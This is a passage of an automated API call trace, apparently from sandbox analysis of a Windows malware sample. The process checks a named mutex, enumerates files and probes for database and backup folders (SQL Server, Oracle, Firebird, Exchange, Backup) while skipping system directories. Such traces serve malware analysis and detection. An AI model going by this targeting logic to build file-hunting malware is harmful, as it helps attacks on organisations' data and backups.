lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0104.856] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0104.856] GlobalLock (hMem=0x450004) returned 0x591988 [0104.856] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.857] GlobalUnlock (hMem=0x450004) returned 0 [0104.857] GlobalLock (hMem=0x450004) returned 0x591988 [0104.857] GlobalLock (hMem=0x45000c) returned 0x593998 [0104.857] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.857] GlobalUnlock (hMem=0x450004) returned 0 [0104.857] GlobalHandle (pMem=0x593998) returned 0x45000c [0104.857] GlobalUnlock (hMem=0x45000c) returned 0 [0104.857] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.857] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8f7000, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdb9ec040, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2f8f7000, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0xf2b88, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0104.857] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0104.857] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0104.857] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.857] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.857] GlobalUnlock (hMem=0x45000c) returned 0 [0104.857] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.857] GlobalLock (hMem=0x450004) returned 0x593998 [0104.857] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.857] GlobalUnlock (hMem=0x45000c) returned 0 [0104.857] GlobalHandle (pMem=0x593998) returned 0x450004 [0104.857] GlobalUnlock (hMem=0x450004) returned 0 [0104.857] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.858] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5e4300, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdbe62980, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2e5e4300, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0x99ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DWTRIG20.EXE", cAlternateFileName="")) returned 1 [0104.858] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0104.858] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0104.858] GlobalLock (hMem=0x450004) returned 0x591988 [0104.858] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.858] GlobalUnlock (hMem=0x450004) returned 0 [0104.858] GlobalLock (hMem=0x450004) returned 0x591988 [0104.858] GlobalLock (hMem=0x45000c) returned 0x593998 [0104.858] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.858] GlobalUnlock (hMem=0x450004) returned 0 [0104.858] GlobalHandle (pMem=0x593998) returned 0x45000c [0104.858] GlobalUnlock (hMem=0x45000c) returned 0 [0104.858] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.858] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5e4300, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdbe62980, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2e5e4300, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0x99ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DWTRIG20.EXE", cAlternateFileName="")) returned 0 [0104.858] GetLastError () returned 0x12 [0104.858] FindClose (in: hFindFile=0x58b020 | out: hFindFile=0x58b020) returned 1 [0104.859] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQUATION", cAlternateFileName="")) returned 1 [0104.859] FileTimeToLocalFileTime (in: lpFileTime=0x18f1f8, lpLocalFileTime=0x18f104 | out: lpLocalFileTime=0x18f104) returned 1 [0104.859] FileTimeToDosDateTime (in: lpFileTime=0x18f104, lpFatDate=0x18f1c6, lpFatTime=0x18f1c4 | out: lpFatDate=0x18f1c6, lpFatTime=0x18f1c4) returned 1 [0104.859] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.859] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.859] GlobalUnlock (hMem=0x45000c) returned 0 [0104.859] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.859] GlobalLock (hMem=0x450004) returned 0x593998 [0104.859] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.859] GlobalUnlock (hMem=0x45000c) returned 0 [0104.859] GlobalHandle (pMem=0x593998) returned 0x450004 [0104.859] GlobalUnlock (hMem=0x450004) returned 0 [0104.859] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.860] GlobalLock (hMem=0x450004) returned 0x591988 [0104.860] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.860] GlobalUnlock (hMem=0x450004) returned 0 [0104.860] GlobalLock (hMem=0x450004) returned 0x591988 [0104.860] GlobalLock (hMem=0x45000c) returned 0x593998 [0104.860] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.860] GlobalUnlock (hMem=0x450004) returned 0 [0104.860] GlobalHandle (pMem=0x593998) returned 0x45000c [0104.860] GlobalUnlock (hMem=0x45000c) returned 0 [0104.860] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.860] SysReAllocStringLen (in: pbstr=0x18f104*=0x0, psz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION", len=0x37 | out: pbstr=0x18f104*="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION") returned 1 [0104.860] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.860] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.860] GlobalUnlock (hMem=0x45000c) returned 0 [0104.860] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.860] GlobalLock (hMem=0x450004) returned 0x593998 [0104.860] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.860] GlobalUnlock (hMem=0x45000c) returned 0 [0104.861] GlobalHandle (pMem=0x593998) returned 0x450004 [0104.861] GlobalUnlock (hMem=0x450004) returned 0 [0104.861] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Microsoft\\Exchange Server", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ࣈ쀀߿", cAlternateFileName="䱈@㐨W㏼W企@\x18㼔V\x18\x1b")) returned 0xffffffff [0104.861] GetLastError () returned 0x3 [0104.861] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.861] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, cbMultiByte=26, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0104.861] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=21, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\ct Edition\\ition\\") returned 21 [0104.862] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Microsoft SQL Server", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ࣈ쀀߿", cAlternateFileName="膴X䱠@㎌W企@\x18㽜V\x181")) returned 0xffffffff [0104.862] GetLastError () returned 0x2 [0104.862] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.862] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, cbMultiByte=21, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0104.862] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=9, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\ct Edition\\ition\\") returned 9 [0104.862] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Firebird", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ࣈ쀀߿", cAlternateFileName="膴X䱠@V企@\x18㥔X\x18;")) returned 0xffffffff [0104.863] GetLastError () returned 0x2 [0104.863] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.863] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0104.863] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=8, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\ct Edition\\ition\\") returned 8 [0104.863] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MSSQL.1", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ࣈ쀀߿", cAlternateFileName="膴X䱠@冄W企@\x18㨜X\x18D")) returned 0xffffffff [0104.863] GetLastError () returned 0x2 [0104.864] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.864] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=8, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\\x10") returned 8 [0104.864] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\ition\\") returned 37 [0104.864] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ࣈ쀀߿", cAlternateFileName="膴X䱠@㎌W企@\x18仔W\x18j")) returned 0xffffffff [0104.864] GetLastError () returned 0x2 [0104.864] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.864] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=37, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\ition\\") returned 37 [0104.865] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\ition\\") returned 6 [0104.865] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Adobe", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ࣈ쀀߿", cAlternateFileName="膴X䱠@堬X企@\x18㥔X\x18q")) returned 0xffffffff [0104.865] GetLastError () returned 0x2 [0104.865] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.865] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="adobe\\仐Wp") returned 6 [0104.865] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\ition\\") returned 7 [0104.866] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Oracle", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ࣈ쀀߿", cAlternateFileName="膴X䱠@℔W企@\x18㨜X\x18y")) returned 0xffffffff [0104.866] GetLastError () returned 0x2 [0104.866] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.866] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="oracle\\X\x10") returned 7 [0104.866] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\ition\\") returned 7 [0104.866] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Archive", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ࣈ쀀߿", cAlternateFileName="膴X䱠@V企@\x18㥔X\x18\x81")) returned 0xffffffff [0104.867] GetLastError () returned 0x2 [0104.867] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.867] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="archiveX\x10") returned 7 [0104.867] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\ition\\") returned 6 [0104.867] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Backup", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ࣈ쀀߿", cAlternateFileName="膴X䱠@堬X企@\x18㨜X\x18\x88")) returned 0xffffffff [0104.867] GetLastError () returned 0x2 [0104.868] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.868] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="backup㥐X\x10") returned 6 [0104.868] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\ition\\") returned 6 [0104.868] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Reserv", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ࣈ쀀߿", cAlternateFileName="膴X䱠@℔W企@\x18㥔X\x18\x8f")) returned 0xffffffff [0104.868] GetLastError () returned 0x2 [0104.918] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.918] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="reserv㨘X\x10") returned 6 [0104.918] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\ition\\") returned 7 [0104.918] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Restore", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5500c4, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="ࣈ쀀߿", cAlternateFileName="膴X䱠@V企@\x18㨜X\x18\x97")) returned 0xffffffff [0104.919] GetLastError () returned 0x2 [0104.919] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.919] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="restoreX\x10") returned 7 [0104.919] GlobalLock (hMem=0x450004) returned 0x591988 [0104.919] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.919] GlobalUnlock (hMem=0x450004) returned 0 [0104.919] GlobalLock (hMem=0x450004) returned 0x591988 [0104.919] GlobalLock (hMem=0x45000c) returned 0x593998 [0104.919] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.919] GlobalUnlock (hMem=0x450004) returned 0 [0104.919] GlobalHandle (pMem=0x593998) returned 0x45000c [0104.919] GlobalUnlock (hMem=0x45000c) returned 0 [0104.919] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.919] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0104.919] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=15, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0104.920] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.920] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0104.920] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 46 [0104.920] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.920] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0104.920] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab28, cbMultiByte=15, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0104.920] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.920] GetEnvironmentVariableA (in: lpName="WINDIR", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0104.920] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=11, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0104.920] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.921] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.921] GlobalUnlock (hMem=0x45000c) returned 0 [0104.921] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.921] GlobalLock (hMem=0x450004) returned 0x593998 [0104.921] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.921] GlobalUnlock (hMem=0x45000c) returned 0 [0104.921] GlobalHandle (pMem=0x593998) returned 0x450004 [0104.921] GlobalUnlock (hMem=0x450004) returned 0 [0104.921] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.921] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab28, cbMultiByte=15, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0104.921] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.921] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=11, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 